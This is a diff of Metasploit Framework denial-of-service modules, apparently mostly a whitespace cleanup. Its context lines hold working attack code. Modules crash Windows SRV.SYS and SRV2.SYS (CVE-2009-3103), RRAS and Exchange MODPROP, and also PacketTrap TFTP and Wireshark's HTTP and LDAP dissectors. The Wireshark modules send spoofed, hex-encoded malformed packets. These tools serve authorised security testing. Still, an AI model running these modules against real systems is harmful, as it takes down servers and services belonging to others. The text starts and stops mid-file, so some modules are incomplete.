|
||||
|
||||
# 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps)
|
||||
|
||||
stubdata =
|
||||
|
||||
stubdata =
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.wstring(path) +
|
||||
NDR.wstring(path) +
|
||||
NDR.long(4) +
|
||||
NDR.long(1) +
|
||||
NDR.long(1) +
|
||||
|
||||
print_status("Calling the vulnerable function...")
|
||||
|
||||
@ -111,8 +111,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
|
||||
'Description' => %q{
|
||||
This module triggers a kernel pool corruption bug in SRV.SYS. Each
|
||||
call to the mailslot write function results in a two byte return value
|
||||
call to the mailslot write function results in a two byte return value
|
||||
being written into the response packet. The code which creates this packet
|
||||
fails to consider these two bytes in the allocation routine, resulting in
|
||||
a slow corruption of the kernel memory pool. These two bytes are almost
|
||||
a slow corruption of the kernel memory pool. These two bytes are almost
|
||||
always set to "\xff\xff" (a short integer with value of -1).
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -48,12 +48,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'DefaultAction' => 'Attack',
|
||||
'DisclosureDate' => 'Jul 11 2006'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('MAILSLOT', [ true, "The mailslot name to use", 'Alerter']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
# MAILSLOT: HydraLsServer
|
||||
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
case action.name
|
||||
when 'Attack'
|
||||
|
||||
|
||||
print_status("Mangling the kernel, two bytes at a time...");
|
||||
|
||||
connect
|
||||
@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
rescue ::Exception => e
|
||||
|
||||
if (i == 1)
|
||||
if (i == 1)
|
||||
print_status("Failed to write any data to the mailslot: #{e}")
|
||||
break
|
||||
end
|
||||
@ -96,8 +96,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Errors:
|
||||
# 0xc0000034 = object not found
|
||||
# 0xc0000205 = insufficient resources (too much data)
|
||||
|
||||
# 0xc0000205 = insufficient resources (too much data)
|
||||
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',
|
||||
'Description' => %q{
|
||||
This module exploits a NULL pointer dereference flaw in the
|
||||
SRV.SYS driver of the Windows operating system. This bug was
|
||||
independently discovered by CORE Security and ISS.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['BID', '19215'],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
@ -52,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
1.upto(5) do |i|
|
||||
print_status("Sending bad SMB transaction request #{i}...");
|
||||
self.simple.client.trans_nonull(
|
||||
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
|
||||
'',
|
||||
Rex::Text.rand_text_alphanumeric(rand(16)+1),
|
||||
3,
|
||||
[1,0,1].pack('vvv'),
|
||||
"\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}",
|
||||
'',
|
||||
Rex::Text.rand_text_alphanumeric(rand(16)+1),
|
||||
3,
|
||||
[1,0,1].pack('vvv'),
|
||||
true
|
||||
)
|
||||
end
|
||||
|
@ -1,10 +1,21 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
|
||||
'Description' => %q{
|
||||
This module exploits a denial of service vulnerability in the
|
||||
@ -14,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => [ 'j.v.vallejo[at]gmail.com' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['MSB', 'MS09-001'],
|
||||
['OSVDB', '48153'],
|
||||
@ -49,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
|
||||
pkt['Payload'].v['ShareAccess'] = 7
|
||||
pkt['Payload'].v['CreateOptions'] = 0x400040
|
||||
pkt['Payload'].v['Impersonation'] = 2
|
||||
pkt['Payload'].v['Impersonation'] = 2
|
||||
pkt['Payload'].v['Disposition'] = 1
|
||||
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
|
||||
'Description' => %q{
|
||||
This module exploits an out of bounds function table dereference in the SMB
|
||||
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2009-3103'],
|
||||
['BID', '36299'],
|
||||
@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
Opt::RPORT(445),
|
||||
OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
connect()
|
||||
|
||||
|
||||
# The SMB 2 dialect must be there
|
||||
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002']
|
||||
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
|
||||
@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Sending request and waiting for a reply...")
|
||||
sock.put(pkt.to_s)
|
||||
r = sock.get_once
|
||||
|
||||
|
||||
if(not r)
|
||||
print_status("The target system has likely crashed")
|
||||
else
|
||||
print_status("Response received: #{r.inspect}")
|
||||
end
|
||||
|
||||
|
||||
disconnect()
|
||||
end
|
||||
|
||||
@ -95,11 +95,11 @@ end
|
||||
0x76 = ExAllocatePoolWithTag
|
||||
0x77 = ExFreePool
|
||||
0x86 = ExAllocatePoolWithTag
|
||||
0x87 = ExFreePoo
|
||||
0x87 = ExFreePoo
|
||||
0x96 = ExAllocatePoolWithTag
|
||||
0x97 = ExFreePoo
|
||||
0x97 = ExFreePoo
|
||||
0xa6 = ExAllocatePoolWithTag
|
||||
0xa7 = ExFreePoo
|
||||
0xa7 = ExFreePoo
|
||||
0xb9 = BugCheckEx
|
||||
0xc7 = SrvBalanceCredits
|
||||
0xdf = SrvNetStatistics data
|
||||
@ -114,10 +114,10 @@ end
|
||||
0x0179 = SrvProcessOplockBreakTimer
|
||||
0x0185 = L"XactSrv"
|
||||
0x01f8 = WppTraceCallback
|
||||
|
||||
|
||||
|
||||
|
||||
Offsets on Vista SP1 (no updates) x86:
|
||||
|
||||
|
||||
0x64 = mov esp, ebp; pop ebp, ret
|
||||
0xde = pool with tag
|
||||
|
||||
@ -154,6 +154,6 @@ end
|
||||
734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe
|
||||
760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c
|
||||
804 -> 830ffc7d - 0000001722268b3e012004020010c01c
|
||||
|
||||
|
||||
|
||||
=end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -22,54 +22,54 @@ class Metasploit3 < Msf::Auxiliary
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference',
|
||||
'Description' => %q{
|
||||
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
|
||||
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
|
||||
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing
|
||||
an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.
|
||||
Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.
|
||||
},
|
||||
'Author' => [ 'sf' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-3103'],
|
||||
[ 'OSVDB', '57799' ],
|
||||
[ 'MSB', 'MS09-050' ],
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options( [ Opt::RPORT( 445 ) ], self.class )
|
||||
end
|
||||
|
||||
def run
|
||||
print_status( "Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}..." )
|
||||
connect
|
||||
|
||||
|
||||
dialects = [ "AAAA" + [ 0xDEADC0DE ].pack( "V" ) + [ 0xCAFEF00D ].pack( "V" ), "SMB 2.002" ]
|
||||
|
||||
|
||||
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join( '' )
|
||||
data += "A" * 128
|
||||
|
||||
|
||||
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
|
||||
|
||||
|
||||
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
|
||||
packet['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
packet['Payload']['SMB'].v['Flags2'] = 0xC853
|
||||
packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF
|
||||
packet['Payload'].v['Payload'] = data
|
||||
|
||||
|
||||
packet = packet.to_s
|
||||
|
||||
|
||||
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
|
||||
sock.put( packet )
|
||||
|
||||
|
||||
response = sock.get_once
|
||||
|
||||
|
||||
if( not response )
|
||||
print_status( "No response. The target system has probably crashed." )
|
||||
else
|
||||
print_status( "Response received. The target system is not vulnerable:\n#{response.inspect}" )
|
||||
end
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -21,15 +21,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference',
|
||||
'Description' => %q{
|
||||
This module triggers a NULL dereference in svchost.exe on
|
||||
all current versions of Windows that run the RRAS service. This
|
||||
all current versions of Windows that run the RRAS service. This
|
||||
service is only accessible without authentication on Windows XP
|
||||
SP1 (using the SRVSVC pipe).
|
||||
SP1 (using the SRVSVC pipe).
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -44,18 +44,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'DefaultAction' => 'Attack',
|
||||
'DisclosureDate' => 'Jun 14 2006'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
connect
|
||||
smb_login
|
||||
|
||||
|
||||
case action.name
|
||||
when 'Attack'
|
||||
|
||||
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
stb = [0, 0, 0, 0].pack('V*')
|
||||
|
||||
|
||||
print_status("Calling the vulnerable function...")
|
||||
begin
|
||||
dcerpc.call(0x0C, stb)
|
||||
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise e
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
disconnect
|
||||
|
@ -1,10 +1,9 @@
|
||||
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -16,19 +15,19 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Vista SP0 SMB Negotiate Protocol DoS',
|
||||
'Description' => %q{
|
||||
This module exploits a flaw in Windows Vista that allows a remote
|
||||
unauthenticated attacker to disable the SMB service. This vulnerability
|
||||
was silently fixed in Microsoft Vista Service Pack 1.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(445)], self.class)
|
||||
end
|
||||
|
||||
@ -38,11 +37,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# 100 requests ensure that the bug is reliably hit
|
||||
1.upto(100) do |i|
|
||||
|
||||
|
||||
begin
|
||||
|
||||
|
||||
connect
|
||||
|
||||
|
||||
# 118 dialects are needed to trigger a non-response
|
||||
dialects = ['NT LM 0.12'] * 118
|
||||
|
||||
@ -59,16 +58,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sock.put(pkt.to_s)
|
||||
|
||||
disconnect
|
||||
|
||||
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
|
||||
|
||||
rescue ::Exception
|
||||
print_status("Error at iteration #{i}: #{$!.class} #{$!}")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Smtp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a heap overflow vulnerability in MS
|
||||
@ -42,23 +42,23 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
|
||||
#
|
||||
def run
|
||||
|
||||
|
||||
connect_login
|
||||
|
||||
modprops = ['attendee', 'categories', 'class', 'created', 'description',
|
||||
'dtstamp', 'duration', 'last-modified',
|
||||
modprops = ['attendee', 'categories', 'class', 'created', 'description',
|
||||
'dtstamp', 'duration', 'last-modified',
|
||||
'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
|
||||
'status', 'summary', 'transp', 'uid']
|
||||
|
||||
|
||||
#modprops = ['dtstamp']
|
||||
|
||||
|
||||
modpropshort = ""
|
||||
modpropbusted = ""
|
||||
modnum = rand(3)
|
||||
@ -79,14 +79,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
boundry = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)
|
||||
|
||||
|
||||
|
||||
# Really, the randomization above only crashes /sometimes/ - it's MUCH more
|
||||
# reliable, and gives crashes in better spots of you use these modprops:
|
||||
|
||||
modpropshort = "dtstamp,"
|
||||
modproplong = "dtstamp, dtstamp,"
|
||||
modpropbusted = "DTSTAMP:\r\n"
|
||||
|
||||
|
||||
mail = "From: #{datastore['MAILFROM']}\r\n"
|
||||
mail << "To: #{datastore['MAILTO']}\r\n"
|
||||
mail << "Subject: #{datastore['SUBJECT']}\r\n"
|
||||
@ -111,12 +111,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
mail << "END:VCALENDAR\r\n"
|
||||
mail << "\r\n--#{boundry}\r\n"
|
||||
mail << "\r\n.\r\n"
|
||||
|
||||
|
||||
print_status("Sending message...")
|
||||
|
||||
|
||||
print_status("Sending message...")
|
||||
sock.put(mail)
|
||||
sock.put("QUIT\r\n")
|
||||
print "<< " + sock.get_once
|
||||
print "<< " + sock.get_once
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'PacketTrap TFTP Server 2.2.5459.0 DoS',
|
||||
'Description' => %q{
|
||||
The PacketTrap TFTP server version 2.2.5459.0 can be
|
||||
|
@ -1,5 +1,9 @@
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -12,9 +16,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Capture
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireshark chunked_encoding_dissector function DOS',
|
||||
'Description' => %q{
|
||||
Wireshark crash when dissecting an HTTP chunked response.
|
||||
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394'],
|
||||
],
|
||||
'DisclosureDate' => 'February 22 2007'))
|
||||
|
||||
|
||||
register_options([
|
||||
OptInt.new('SPORT', [true, 'The source port used to send the malicious HTTP response', 80]),
|
||||
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
|
||||
@ -50,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.protocol = 6
|
||||
n.l3.id = rand(0x10000)
|
||||
n.l3.ttl = 64
|
||||
|
||||
|
||||
n.l4 = Racket::L4::TCP.new
|
||||
n.l4.dst_port = rand(65535)+1
|
||||
n.l4.seq = rand(0x100000000)
|
||||
@ -60,11 +64,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l4.src_port = datastore['SPORT'].to_i
|
||||
n.l4.window = 3072
|
||||
n.l4.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
pkt = n.pack
|
||||
|
||||
|
||||
capture_sendto(pkt, rhost)
|
||||
|
||||
close_pcap
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Capture
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Wireshark LDAP dissector DOS',
|
||||
@ -31,13 +31,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
[ 'CVE', '2008-1562' ],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 28 2008')
|
||||
|
||||
'DisclosureDate' => 'Mar 28 2008')
|
||||
|
||||
register_options([
|
||||
OptInt.new('RPORT', [true, 'The destination port', 389]),
|
||||
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
|
||||
], self.class)
|
||||
|
||||
|
||||
deregister_options('FILTER','PCAPFILE')
|
||||
end
|
||||
|
||||
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Sending malformed LDAP packet to #{rhost}")
|
||||
|
||||
m = Rex::Text.rand_text_alpha_lower(3)
|
||||
|
||||
|
||||
open_pcap
|
||||
|
||||
n = Racket::Racket.new
|
||||
@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l3.protocol = 6
|
||||
n.l3.id = rand(0x10000)
|
||||
n.l3.ttl = 64
|
||||
|
||||
|
||||
n.l4 = Racket::L4::TCP.new
|
||||
n.l4.src_port = rand(65535)+1
|
||||
n.l4.seq = rand(0x100000000)
|
||||
@ -68,8 +68,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
n.l4.window = 3072
|
||||
n.l4.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
|
||||
|
||||
n.l4.fix!(n.l3.src_ip, n.l3.dst_ip, '')
|
||||
|
||||
